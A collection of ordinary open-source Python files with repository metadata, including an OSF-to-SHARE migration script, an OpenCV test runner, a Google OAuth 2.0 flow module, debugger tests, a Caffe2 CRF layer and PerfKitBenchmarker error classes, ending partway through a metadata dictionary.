""" Sends specified registrations to SHARE """
import argparse
import json
import logging
import django
django.setup()
from osf.models import AbstractNode
from scripts import utils as script_utils
from website import settings
from website.app import setup_django
from website.project.tasks import update_node_share
logger = logging.getLogger(__name__)
def migrate(registrations):
assert settings.SHARE_URL, 'SHARE_URL must be set to migrate.'
assert settings.SHARE_API_TOKEN, 'SHARE_API_TOKEN must be set to migrate.'
registrations_count = len(registrations)
count = 0
logger.info('Preparing to migrate {} registrations.'.format(registrations_count))
for registration_id in registrations:
count += 1
logger.info('{}/{} - {}'.format(count, registrations_count, registration_id))
registration = AbstractNode.load(registration_id)
assert registration.type == 'osf.registration'
update_node_share(registration)
logger.info('Registration {} was sent to SHARE.'.format(registration_id))
def main():
parser = argparse.ArgumentParser(
description='Changes the provider of specified Preprint objects'
)
parser.add_argument(
'--targets',
action='store',
dest='targets',
help='List of targets, of form ["registration_id", ...]',
)
pargs = parser.parse_args()
script_utils.add_file_logger(logger, __file__)
setup_django()
migrate(json.loads(pargs.targets))
if __name__ == '__main__':
main()
| pattisdr/osf.io | scripts/send_specific_registration_data_to_share.py | Python | apache-2.0 | 1,537 |
#!/usr/bin/env python
import datetime
from run_utils import *
class TestSuite(object):
def __init__(self, options, cache):
self.options = options
self.cache = cache
self.nameprefix = "opencv_" + self.options.mode + "_"
self.tests = self.cache.gatherTests(self.nameprefix + "*", self.isTest)
def getOS(self):
return getPlatformVersion() or self.cache.getOS()
def getHardware(self):
res = []
if self.cache.getArch() in ["x86", "x64"] and self.cache.withCuda():
res.append("CUDA")
return res
def getLogName(self, app, timestamp):
app = self.getAlias(app)
rev = self.cache.getGitVersion()
if isinstance(timestamp, datetime.datetime):
timestamp = timestamp.strftime("%Y%m%d-%H%M%S")
if self.options.longname:
small_pieces = [self.getOS(), self.cache.getArch()] + self.cache.getDependencies() + self.getHardware() + [self.cache.getSIMDFeatures()]
big_pieces = [app, str(rev), timestamp, "_".join([p for p in small_pieces if p])]
l = "__".join(big_pieces)
else:
pieces = [app, self.cache.getOS(), self.cache.getArch()] + self.getHardware() + [rev, timestamp]
lname = "_".join([p for p in pieces if p])
lname = re.sub(r'[\(\)\[\]\s,]', '_', lname)
l = re.sub(r'_+', '_', lname)
return l + ".xml"
def listTests(self, short = False, main = False):
if len(self.tests) == 0:
raise Err("No tests found")
for t in self.tests:
if short:
t = self.getAlias(t)
if not main or self.cache.isMainModule(t):
log.info("%s", t)
def getAlias(self, fname):
return sorted(self.getAliases(fname), key = len)[0]
def getAliases(self, fname):
def getCuts(fname, prefix):
# filename w/o extension (opencv_test_core)
noext = re.sub(r"\.(exe|apk)$", '', fname)
# filename w/o prefix (core.exe)
nopref = fname
if fname.startswith(prefix):
nopref = fname[len(prefix):]
# filename w/o prefix and extension (core)
noprefext = noext
if noext.startswith(prefix):
noprefext = noext[len(prefix):]
return noext, nopref, noprefext
# input is full path ('/home/.../bin/opencv_test_core') or 'java'
res = [fname]
fname = os.path.basename(fname)
res.append(fname) # filename (opencv_test_core.exe)
for s in getCuts(fname, self.nameprefix):
res.append(s)
if self.cache.build_type == "Debug" and "Visual Studio" in self.cache.cmake_generator:
res.append(re.sub(r"d$", '', s)) # MSVC debug config, remove 'd' suffix
log.debug("Aliases: %s", set(res))
return set(res)
def getTest(self, name):
# return stored test name by provided alias
for t in self.tests:
if name in self.getAliases(t):
return t
raise Err("Can not find test: %s", name)
def getTestList(self, white, black):
res = [t for t in white or self.tests if self.getAlias(t) not in black]
if len(res) == 0:
raise Err("No tests found")
return set(res)
def isTest(self, fullpath):
if fullpath == "java":
return True
if not os.path.isfile(fullpath):
return False
if self.cache.getOS() == "nt" and not fullpath.endswith(".exe"):
return False
return os.access(fullpath, os.X_OK)
def wrapInValgrind(self, cmd = []):
if self.options.valgrind:
res = ['valgrind']
if self.options.valgrind_supp:
res.append("--suppressions=%s" % self.options.valgrind_supp)
res.extend(self.options.valgrind_opt)
return res + cmd
return cmd
def runTest(self, path, logfile, workingDir, args = []):
args = args[:]
exe = os.path.abspath(path)
if path == "java":
cmd = [self.cache.ant_executable, "-Dopencv.build.type=%s" % self.cache.build_type, "buildAndTest"]
ret = execute(cmd, cwd = self.cache.java_test_binary_dir + "/.build")
return None, ret
else:
if isColorEnabled(args):
args.append("--gtest_color=yes")
cmd = self.wrapInValgrind([exe] + args)
tempDir = TempEnvDir('OPENCV_TEMP_PATH', "__opencv_temp.")
tempDir.init()
log.warning("Run: %s" % " ".join(cmd))
ret = execute(cmd, cwd = workingDir)
tempDir.clean()
hostlogpath = os.path.join(workingDir, logfile)
if os.path.isfile(hostlogpath):
return hostlogpath, ret
return None, ret
def checkPrerequisites(self):
if self.cache.getArch() == "x64" and hostmachine == "x86":
raise Err("Target architecture is incompatible with current platform")
def runTests(self, tests, black, workingDir, args = []):
self.checkPrerequisites()
args = args[:]
logs = []
test_list = self.getTestList(tests, black)
date = datetime.datetime.now()
if len(test_list) != 1:
args = [a for a in args if not a.startswith("--gtest_output=")]
ret = 0
for test in test_list:
more_args = []
exe = self.getTest(test)
userlog = [a for a in args if a.startswith("--gtest_output=")]
if len(userlog) == 0:
logname = self.getLogName(exe, date)
more_args.append("--gtest_output=xml:" + logname)
else:
logname = userlog[0][userlog[0].find(":")+1:]
log.debug("Running the test: %s (%s) ==> %s in %s", exe, args + more_args, logname, workingDir)
if self.options.dry_run:
logfile, r = None, 0
else:
logfile, r = self.runTest(exe, logname, workingDir, args + more_args)
log.debug("Test returned: %s ==> %s", r, logfile)
if r != 0:
ret = r
if logfile:
logs.append(os.path.relpath(logfile, workingDir))
return logs, ret
#===================================================================================================
if __name__ == "__main__":
log.error("This is utility file, please execute run.py script")
| DamianPilot382/Rubiks-Cube-Solver | opencv/sources/modules/ts/misc/run_suite.py | Python | apache-2.0 | 6,541 |
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 Authorization Flow
.. warning::
This module is experimental and is subject to change signficantly
within major version releases.
This module provides integration with `requests-oauthlib`_ for running the
`OAuth 2.0 Authorization Flow`_ and acquiring user credentials.
Here's an example of using the flow with the installed application
authorization flow::
import google.oauth2.flow
# Create the flow using the client secrets file from the Google API
# Console.
flow = google.oauth2.flow.Flow.from_client_secrets_file(
'path/to/client_secrets.json',
scopes=['profile', 'email'],
redirect_uri='urn:ietf:wg:oauth:2.0:oob')
# Tell the user to go to the authorization URL.
auth_url, _ = flow.authorization_url(prompt='consent')
print('Please go to this URL: {}'.format(auth_url))
# The user will get an authorization code. This code is used to get the
# access token.
code = input('Enter the authorization code: ')
flow.fetch_token(code=code)
# You can use flow.credentials, or you can just get a requests session
# using flow.authorized_session.
session = flow.authorized_session()
print(session.get('https://www.googleapis.com/userinfo/v2/me').json())
.. _requests-oauthlib: http://requests-oauthlib.readthedocs.io/en/stable/
.. _OAuth 2.0 Authorization Flow:
https://tools.ietf.org/html/rfc6749#section-1.2
"""
import json
import google.auth.transport.requests
import google.oauth2.credentials
import google.oauth2.oauthlib
class Flow(object):
"""OAuth 2.0 Authorization Flow
This class uses a :class:`requests_oauthlib.OAuth2Session` instance at
:attr:`oauth2session` to perform all of the OAuth 2.0 logic. This class
just provides convenience methods and sane defaults for doing Google's
particular flavors of OAuth 2.0.
Typically you'll construct an instance of this flow using
:meth:`from_client_secrets_file` and a `client secrets file`_ obtained
from the `Google API Console`_.
.. _client secrets file:
https://developers.google.com/identity/protocols/OAuth2WebServer
#creatingcred
.. _Google API Console:
https://console.developers.google.com/apis/credentials
"""
def __init__(self, oauth2session, client_type, client_config):
"""
Args:
oauth2session (requests_oauthlib.OAuth2Session):
The OAuth 2.0 session from ``requests-oauthlib``.
client_type (str): The client type, either ``web`` or
``installed``.
client_config (Mapping[str, Any]): The client
configuration in the Google `client secrets`_ format.
.. _client secrets:
https://developers.google.com/api-client-library/python/guide
/aaa_client_secrets
"""
self.client_type = client_type
"""str: The client type, either ``'web'`` or ``'installed'``"""
self.client_config = client_config[client_type]
"""Mapping[str, Any]: The OAuth 2.0 client configuration."""
self.oauth2session = oauth2session
"""requests_oauthlib.OAuth2Session: The OAuth 2.0 session."""
@classmethod
def from_client_config(cls, client_config, scopes, **kwargs):
"""Creates a :class:`requests_oauthlib.OAuth2Session` from client
configuration loaded from a Google-format client secrets file.
Args:
client_config (Mapping[str, Any]): The client
configuration in the Google `client secrets`_ format.
scopes (Sequence[str]): The list of scopes to request during the
flow.
kwargs: Any additional parameters passed to
:class:`requests_oauthlib.OAuth2Session`
Returns:
Flow: The constructed Flow instance.
Raises:
ValueError: If the client configuration is not in the correct
format.
.. _client secrets:
https://developers.google.com/api-client-library/python/guide
/aaa_client_secrets
"""
if 'web' in client_config:
client_type = 'web'
elif 'installed' in client_config:
client_type = 'installed'
else:
raise ValueError(
'Client secrets must be for a web or installed app.')
session, client_config = (
google.oauth2.oauthlib.session_from_client_config(
client_config, scopes, **kwargs))
return cls(session, client_type, client_config)
@classmethod
def from_client_secrets_file(cls, client_secrets_file, scopes, **kwargs):
"""Creates a :class:`Flow` instance from a Google client secrets file.
Args:
client_secrets_file (str): The path to the client secrets .json
file.
scopes (Sequence[str]): The list of scopes to request during the
flow.
kwargs: Any additional parameters passed to
:class:`requests_oauthlib.OAuth2Session`
Returns:
Flow: The constructed Flow instance.
"""
with open(client_secrets_file, 'r') as json_file:
client_config = json.load(json_file)
return cls.from_client_config(client_config, scopes=scopes, **kwargs)
@property
def redirect_uri(self):
"""The OAuth 2.0 redirect URI. Pass-through to
``self.oauth2session.redirect_uri``."""
return self.oauth2session.redirect_uri
@redirect_uri.setter
def redirect_uri(self, value):
self.oauth2session.redirect_uri = value
def authorization_url(self, **kwargs):
"""Generates an authorization URL.
This is the first step in the OAuth 2.0 Authorization Flow. The user's
browser should be redirected to the returned URL.
This method calls
:meth:`requests_oauthlib.OAuth2Session.authorization_url`
and specifies the client configuration's authorization URI (usually
Google's authorization server) and specifies that "offline" access is
desired. This is required in order to obtain a refresh token.
Args:
kwargs: Additional arguments passed through to
:meth:`requests_oauthlib.OAuth2Session.authorization_url`
Returns:
Tuple[str, str]: The generated authorization URL and state. The
user must visit the URL to complete the flow. The state is used
when completing the flow to verify that the request originated
from your application. If your application is using a different
:class:`Flow` instance to obtain the token, you will need to
specify the ``state`` when constructing the :class:`Flow`.
"""
url, state = self.oauth2session.authorization_url(
self.client_config['auth_uri'],
access_type='offline', **kwargs)
return url, state
def fetch_token(self, **kwargs):
"""Completes the Authorization Flow and obtains an access token.
This is the final step in the OAuth 2.0 Authorization Flow. This is
called after the user consents.
This method calls
:meth:`requests_oauthlib.OAuth2Session.fetch_token`
and specifies the client configuration's token URI (usually Google's
token server).
Args:
kwargs: Arguments passed through to
:meth:`requests_oauthlib.OAuth2Session.fetch_token`. At least
one of ``code`` or ``authorization_response`` must be
specified.
Returns:
Mapping[str, str]: The obtained tokens. Typically, you will not use
return value of this function and instead and use
:meth:`credentials` to obtain a
:class:`~google.auth.credentials.Credentials` instance.
"""
return self.oauth2session.fetch_token(
self.client_config['token_uri'],
client_secret=self.client_config['client_secret'],
**kwargs)
@property
def credentials(self):
"""Returns credentials from the OAuth 2.0 session.
:meth:`fetch_token` must be called before accessing this. This method
constructs a :class:`google.oauth2.credentials.Credentials` class using
the session's token and the client config.
Returns:
google.oauth2.credentials.Credentials: The constructed credentials.
Raises:
ValueError: If there is no access token in the session.
"""
return google.oauth2.oauthlib.credentials_from_session(
self.oauth2session, self.client_config)
def authorized_session(self):
"""Returns a :class:`requests.Session` authorized with credentials.
:meth:`fetch_token` must be called before this method. This method
constructs a :class:`google.auth.transport.requests.AuthorizedSession`
class using this flow's :attr:`credentials`.
Returns:
google.auth.transport.requests.AuthorizedSession: The constructed
session.
"""
return google.auth.transport.requests.AuthorizedSession(
self.credentials)
| axbaretto/beam | sdks/python/.tox/py27gcp/lib/python2.7/site-packages/google/oauth2/flow.py | Python | apache-2.0 | 9,887 |
"""
Test breakpoint command for different options.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.lldbtest import *
import lldbsuite.test.lldbutil as lldbutil
class BreakpointOptionsTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def test(self):
"""Test breakpoint command for different options."""
self.build()
self.breakpoint_options_test()
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.line = line_number('main.cpp', '// Set break point at this line.')
def breakpoint_options_test(self):
"""Test breakpoint command for different options."""
exe = self.getBuildArtifact("a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# This should create a breakpoint with 1 locations.
lldbutil.run_break_set_by_file_and_line(
self,
"main.cpp",
self.line,
extra_options="-K 1",
num_expected_locations=1)
lldbutil.run_break_set_by_file_and_line(
self,
"main.cpp",
self.line,
extra_options="-K 0",
num_expected_locations=1)
# Run the program.
self.runCmd("run", RUN_SUCCEEDED)
# Stopped once.
self.expect("thread backtrace", STOPPED_DUE_TO_BREAKPOINT,
substrs=["stop reason = breakpoint 2."])
# Check the list of breakpoint.
self.expect(
"breakpoint list -f",
"Breakpoint locations shown correctly",
substrs=[
"1: file = 'main.cpp', line = %d, exact_match = 0, locations = 1" %
self.line,
"2: file = 'main.cpp', line = %d, exact_match = 0, locations = 1" %
self.line])
# Continue the program, there should be another stop.
self.runCmd("process continue")
# Stopped again.
self.expect("thread backtrace", STOPPED_DUE_TO_BREAKPOINT,
substrs=["stop reason = breakpoint 1."])
# Continue the program, we should exit.
self.runCmd("process continue")
# We should exit.
self.expect("process status", "Process exited successfully",
patterns=["^Process [0-9]+ exited with status = 0"])
def breakpoint_options_language_test(self):
"""Test breakpoint command for language option."""
exe = self.getBuildArtifact("a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# This should create a breakpoint with 1 locations.
lldbutil.run_break_set_by_symbol(
self,
'ns::func',
sym_exact=False,
extra_options="-L c++",
num_expected_locations=1)
# This should create a breakpoint with 0 locations.
lldbutil.run_break_set_by_symbol(
self,
'ns::func',
sym_exact=False,
extra_options="-L c",
num_expected_locations=0)
self.runCmd("settings set target.language c")
lldbutil.run_break_set_by_symbol(
self, 'ns::func', sym_exact=False, num_expected_locations=0)
# Run the program.
self.runCmd("run", RUN_SUCCEEDED)
# Stopped once.
self.expect("thread backtrace", STOPPED_DUE_TO_BREAKPOINT,
substrs=["stop reason = breakpoint 1."])
# Continue the program, we should exit.
self.runCmd("process continue")
# We should exit.
self.expect("process status", "Process exited successfully",
patterns=["^Process [0-9]+ exited with status = 0"])
| llvm-mirror/lldb | packages/Python/lldbsuite/test/functionalities/breakpoint/breakpoint_options/TestBreakpointOptions.py | Python | apache-2.0 | 3,765 |
import vtrace.tests as vt_tests
breakpoints = {
'windows': 'ntdll.NtTerminateProcess',
'linux': 'libc.exit',
'freebsd': 'libc.exit',
}
class VtraceExpressionTest(vt_tests.VtraceProcessTest):
def test_vtrace_sym(self):
plat = self.trace.getMeta('Platform')
symname = breakpoints.get(plat)
entry = self.trace.parseExpression(symname)
addEntry = self.trace.parseExpression(symname + " + 5")
self.assertTrue(entry + 5 == addEntry)
def test_baselib(self):
plat = self.trace.getMeta('Platform')
libname = breakpoints.get(plat).split('.')[0]
entry = self.trace.parseExpression(libname)
addEntry = self.trace.parseExpression(libname + " + 5")
# grab a symbol in the library and compare offsets against that?
self.assertTrue(entry + 5 == addEntry)
| bat-serjo/vivisect | vtrace/tests/test_expressions.py | Python | apache-2.0 | 851 |
#!/usr/bin/python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all audience segments.
To create audience segments, run create_audience_segments.py.
"""
# Import appropriate modules from the client library.
from googleads import dfp
def main(client):
# Initialize client object.
client = dfp.DfpClient.LoadFromStorage()
# Initialize appropriate service.
audience_segment_service = client.GetService(
'AudienceSegmentService', version='v201411')
# Create statement object to select all audience segments.
statement = dfp.FilterStatement()
# Get audience segments by statement.
while True:
response = audience_segment_service.getAudienceSegmentsByStatement(
statement.ToStatement())
if 'results' in response:
# Display results.
for segment in response['results']:
print ('Audience segment with id \'%s\' and name '
'\'%s\' of size %s was found.' %
(segment['id'], segment['name'], segment['size']))
statement.offset += dfp.SUGGESTED_PAGE_LIMIT
else:
break
print '\nNumber of results found: %s' % response['totalResultSetSize']
if __name__ == '__main__':
# Initialize client object.
dfp_client = dfp.DfpClient.LoadFromStorage()
main(dfp_client)
| wubr2000/googleads-python-lib | examples/dfp/v201411/audience_segment_service/get_all_audience_segments.py | Python | apache-2.0 | 1,845 |
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
## @package crf
# Module caffe2.python.crf
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import core, recurrent, model_helper, brew
import numpy as np
'''
Due to a limitation in ReccurentNetworkOp, this layer only supports batch_size=1
In order to support batch_size > 1, we will have to implement the CRFUnit
and its gradient in C++ and handle the different batches there.
'''
class CRFWithLoss(object):
def __init__(self, model, num_classes, transitions_blob=None):
self.model = model
self.num_classes = num_classes
self.num_classes_padded = num_classes + 2 # After adding BOS and EOS
if not transitions_blob:
transitions_blob = self.model.param_init_net.UniformFill(
[],
[core.ScopedBlobReference('crf_transitions')],
shape=[self.num_classes_padded, self.num_classes_padded],
min=-1.0,
max=1.0
)
self.transitions = transitions_blob
self.model.params.append(self.transitions)
def crf_loss(self, predictions, labels, seq_lengths=None):
# Since the transitions matrix is a shared parameter, need to
# take a snapshot of it at the beginning since it can be updated
# in between the operators that uses it when doing parallel updates
transitions_snapshot = self.model.net.Copy(
self.transitions, core.ScopedBlobReference('transitions_snapshot')
)
# Compute best path unary score from the logits
path_unary_score = self._gather_entries_sum(
predictions, labels, self.num_classes
)
# Append BOS and EOS entries to the predictions and labels
predictions = self._pad_predictions(predictions)
labels = self._pad_labels(labels)
# Compute best path binary scores from the transitions matrix
path_binary_score = self._path_binary_scores(
labels, transitions_snapshot, seq_lengths
)
path_total_score = self.model.net.Add(
[path_binary_score, path_unary_score],
core.ScopedBlobReference('path_total')
)
# Compute all paths score
zero_index = self.model.param_init_net.ConstantFill(
[], shape=[1], value=0
)
initial_state = self.model.net.Gather(
[predictions, zero_index],
core.ScopedBlobReference('rnn_initial'),
dense_gradient=True
)
input_data, _ = self.model.net.RemovePadding(
[predictions],
padding_width=1,
end_padding_width=0,
outputs=2,
)
input_data = self.model.net.ExpandDims(
[input_data],
core.ScopedBlobReference('rnn_input_data'),
dims=[1]
)
# Due to a bug in RecurrentNetworkGradientOp, we need to copy the
# transitions blob before sending it to the recurrent network
transitions_copy = self.model.net.Copy(
transitions_snapshot, core.ScopedBlobReference('transitions_copy')
)
all_paths_scores = self._crf_forward(
input_data, initial_state, transitions_copy
)
loss = self.model.net.Sub(
[all_paths_scores, path_total_score],
core.ScopedBlobReference('crf_loss')
)
return loss
def _pad_predictions(self, predictions):
# This function will introduce two labels for beginning of sequence
# And end of sequence, it will make the necessary udpates to the
# the predictions blob
low_score = -1000.0 # An arbitray very low number
b_scores = np.array(
[[low_score] * self.num_classes + [0, low_score]]
).astype(np.float32)
e_scores = np.array(
[[low_score] * self.num_classes + [low_score, 0]]
).astype(np.float32)
b_scores = self.model.param_init_net.GivenTensorFill(
[], "b_scores", shape=[1, self.num_classes_padded], values=b_scores
)
e_scores = self.model.param_init_net.GivenTensorFill(
[], "e_scores", shape=[1, self.num_classes_padded], values=e_scores
)
zero_index = self.model.net.ConstantFill(
[], shape=[1, ], value=0
)
length = self.model.net.Gather(
[self.model.net.Shape([predictions]), zero_index],
)
length = self.model.net.Cast(length, to='int32')
t_range = self.model.net.LengthsRangeFill(length)
padding = self.model.net.ConstantFill([t_range], value=low_score)
padding = self.model.net.ExpandDims(padding, dims=[1])
padded_predictions, _ = self.model.net.Concat(
[predictions, padding, padding],
outputs=2,
axis=1
)
padded_predictions_concat, _ = self.model.net.Concat(
[b_scores, padded_predictions, e_scores],
outputs=2,
axis=0
)
return padded_predictions_concat
def _pad_labels(self, labels):
bos_i = self.num_classes
eos_i = self.num_classes + 1
bos_i_b = self.model.param_init_net.ConstantFill(
[], shape=[1], value=bos_i
)
eos_i_b = self.model.param_init_net.ConstantFill(
[], shape=[1], value=eos_i
)
labels = self.model.net.Cast([labels], to='int64')
padded_labels, _ = self.model.net.Concat(
[bos_i_b, labels, eos_i_b],
axis=0,
outputs=2
)
return padded_labels
def _path_binary_scores(self, labels, transitions, seq_lengths=None):
column_ids, _ = self.model.net.RemovePadding(
[labels],
outputs=2,
padding_width=1,
end_padding_width=0
)
row_ids, _ = self.model.net.RemovePadding(
[labels],
outputs=2,
padding_width=0,
end_padding_width=1
)
# Since there is no multi-dimensional gather, I flatten the matrix to
# a 1-d vector and transform the ids to (row_ids * num_columns +
# column_ids) and do gather in 1-d
num_columns_blob = self.model.net.ConstantFill(
[row_ids],
value=self.num_classes_padded,
)
flattened_ids = self.model.net.Mul([row_ids, num_columns_blob])
flattened_ids = self.model.net.Add([flattened_ids, column_ids])
flattened_transitions = self.model.net.FlattenToVec([transitions])
entries = self.model.net.Gather(
[flattened_transitions, flattened_ids],
dense_gradient=True
)
return self.model.ReduceFrontSum(entries)
def _gather_entries_sum(self, in_data, indices, index_size):
indices = self.model.net.Cast([indices], to='int64')
index_size_blob = self.model.param_init_net.ConstantFill(
[],
shape=[1],
value=index_size,
)
query_one_hot = self.model.net.OneHot(
[indices, index_size_blob]
)
flattend_query = self.model.net.FlattenToVec(query_one_hot)
flattend_data = self.model.net.FlattenToVec(in_data)
query_scores = self.model.net.DotProduct(
[flattend_query, flattend_data]
)
final_sum = self.model.net.ReduceFrontSum([query_scores])
return final_sum
def _crf_forward(
self,
input_blob,
initial_state,
transitions_copy,
seq_lengths=None
):
# Build the RNN net and get the last timestep output
out_last = self.build_crf_net(
input_blob, initial_state, transitions_copy
)
out_last, _ = self.model.net.Reshape(
[out_last],
outputs=2,
shape=(self.num_classes_padded,)
)
zero_segment_id = self.model.param_init_net.ConstantFill(
[],
value=0,
shape=[self.num_classes_padded],
dtype=core.DataType.INT32,
)
# Compute the accumlated total score of all the paths
accum_score = self.model.net.SortedSegmentRangeLogSumExp(
[out_last, zero_segment_id]
)
accum_score, _ = self.model.net.Reshape(
accum_score,
outputs=2,
shape=()
)
return accum_score
def build_crf_net(self, input_blob, initial_state, transitions):
'''
Adds the crf_net recurrent operator to the model.
model: model_helper.ModelHelper object new operators would be added
to
input_blob: the input sequence in a format T x N x D
where T is sequence size, N - batch size and D - input dimention
##Only supports batch-size 1##
seq_lengths: blob containing sequence lengths (unused)
'''
scope = 'crf_net'
def s(name):
''
# We have to manually scope due to our internal/external blob
# relationships.
return "{}/{}".format(str(scope), str(name))
step_model = model_helper.ModelHelper(name='crf_step',
param_model=self.model)
input_t, cell_t_prev, _ = (
step_model.net.AddExternalInputs(
core.ScopedBlobReference('input_t'),
core.ScopedBlobReference('cell_t_prev'),
transitions
)
)
zero_segment_id = step_model.param_init_net.ConstantFill(
[],
[s('zero_segment_id')],
value=0,
shape=[self.num_classes_padded],
dtype=core.DataType.INT32,
)
# A hack to bypass model cloning for test
step_model.param_init_net.AddExternalOutput(zero_segment_id)
""" the CRF step """
# Do tile
prev_transpose = brew.transpose(
step_model,
cell_t_prev,
[s('prev_transpose')],
axes=(0, 2, 1),
)
prev_tiled = step_model.net.Tile(
prev_transpose,
[s('prev_tiled')],
tiles=self.num_classes_padded,
axis=2,
)
input_t_tiled = step_model.net.Tile(
input_t,
[s('input_t_tiled')],
tiles=self.num_classes_padded,
axis=1,
)
input_with_prev = step_model.net.Add(
[prev_tiled, input_t_tiled],
[s('input_with_prev')]
)
all_with_transitions = step_model.net.Add(
[input_with_prev, transitions],
[s('prev_with_transitions')],
broadcast=1,
use_grad_hack=1,
)
all_with_transitions_reshaped, _ = step_model.net.Reshape(
all_with_transitions,
[s('all_with_transitions_reshaped'), s('all_with_transitions_orig')],
shape=(self.num_classes_padded, self.num_classes_padded)
)
cell_t = step_model.net.SortedSegmentRangeLogSumExp(
[all_with_transitions_reshaped, zero_segment_id],
[s('cell_t')],
)
step_model.net.AddExternalOutputs(cell_t)
""" recurrent network """
cell_input_blob = initial_state
out_all, out_last = recurrent.recurrent_net(
net=self.model.net,
cell_net=step_model.net,
inputs=[(input_t, input_blob)],
initial_cell_inputs=[
(cell_t_prev, cell_input_blob),
],
links={
cell_t_prev: cell_t,
},
scope=scope,
outputs_with_grads=(1,)
)
return out_last
def update_predictions(self, classes):
def crf_update_predictions_op(inputs, outputs):
# This operator will compute the best path of classes by performing
# Viterbi decoding and then updates the predictions to make the tag
# On the best path has the highest score among the others
predictions = inputs[0].data
transitions = inputs[1].data
predictions = inputs[0].data
predictions_shape = inputs[0].shape
outputs[0].reshape(predictions_shape)
trellis = np.zeros(predictions_shape)
backpointers = np.zeros(predictions_shape, dtype=np.int32)
trellis[0] = predictions[0]
for t in range(1, predictions_shape[0]):
v = np.expand_dims(trellis[t - 1], 1) + transitions
trellis[t] = predictions[t] + np.max(v, 0)
backpointers[t] = np.argmax(v, 0)
viterbi = [np.argmax(trellis[-1])]
for bp in reversed(backpointers[1:]):
viterbi.append(bp[viterbi[-1]])
viterbi.reverse()
new_predictions = np.zeros(predictions_shape)
old_bests = []
for i, w_predictions in enumerate(predictions):
# Get the current tag with the maximum score
new_predictions[i] = predictions[i]
old_best = np.argmax(w_predictions)
old_bests.append(old_best)
# Swap the scores of the current best tag and the tag on the
# Viterbi path
w_predictions[viterbi[i]], w_predictions[old_best] = \
w_predictions[old_best], w_predictions[viterbi[i]]
new_predictions[i] = w_predictions
# Remove the BOS and EOS entries from the predictions matrix
orig_predictions = new_predictions[1:-1, 0:-2]
outputs[0].reshape(orig_predictions.shape)
outputs[0].data[...] = orig_predictions
padded_classes = self._pad_predictions(classes)
new_classes = self.model.net.Python(crf_update_predictions_op)(
[padded_classes, self.transitions],
core.ScopedBlobReference('post_crf_classes')
)
return new_classes
| Yangqing/caffe2 | caffe2/python/crf.py | Python | apache-2.0 | 15,115 |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A common location for all perfkitbenchmarker-defined exceptions."""
import pprint
class Error(Exception):
pass
class VirtualMachine(object):
"""Errors raised by virtual_machine.py."""
class RemoteExceptionError(Error):
pass
class VirtualMachineError(Error):
"""An error raised when VM is having an issue."""
@classmethod
def FromDebugInfo(cls, info, error_message):
"""Create VirtualMachineError class from debug information.
Args:
info: A dictionary containing debug information (such as traceroute
info).
error_message: the error message from the originating code.
Returns:
a cls exception class
Raises:
TypeError: if info is not an instance of dictionary.
"""
if isinstance(info, dict):
info = VirtualMachine.VirtualMachineError.FormatDebugInfo(
info, error_message)
return cls(info)
raise TypeError('The argument of FromDebugInfo should be an instance '
'of dictionary.')
@staticmethod
def FormatDebugInfo(info, error_message):
"""A function to return a string in human readable format.
Args:
info: A dictionary containing debug information (such as traceroute
info).
error_message: the error message from the originating code.
Returns:
A human readable string of debug information.
"""
sep = '\n%s\n' % ('-' * 65)
def AddHeader(error, header, message):
error += '{sep}{header}\n{message}\n'.format(
sep=sep, header=header, message=message)
return error
def AddKeyIfExists(result, header, key):
if key in info:
result = AddHeader(result, header, info[key])
del info[key]
return result
result = AddHeader('', 'error_message:',
error_message) if error_message else ''
result = AddKeyIfExists(result, 'traceroute:', 'traceroute')
return AddHeader(result, 'Debug Info:', pprint.pformat(info))
class VmStateError(VirtualMachineError):
pass
class VmUtil(object):
"""Errors raised by vm_utils.py."""
class SshConnectionError(VirtualMachine.VirtualMachineError):
"""An error raised when VM is running but not SSHable."""
pass
class RestConnectionError(Error):
pass
class IpParsingError(Error):
pass
class UserSetupError(Error):
pass
class ThreadException(Error):
pass
class CalledProcessException(Error):
pass
class Benchmarks(object):
"""Errors raised by individual benchmark."""
class PrepareException(Error):
pass
class MissingObjectCredentialException(Error):
pass
class RunError(Error):
pass
class Resource(object):
"""Errors related to resource creation and deletion."""
class RetryableCreationError(Error):
pass
class RetryableDeletionError(Error):
pass
| gablg1/PerfKitBenchmarker | perfkitbenchmarker/errors.py | Python | apache-2.0 | 3,525 |
metadata = {
"abbreviation": "ex",
"capitol_timezone": "Etc/UTC",
"legislature_name": "Example Legislature",
"lower_chamber_name": "House of Representatives",
"lower_chamber_term": 2,
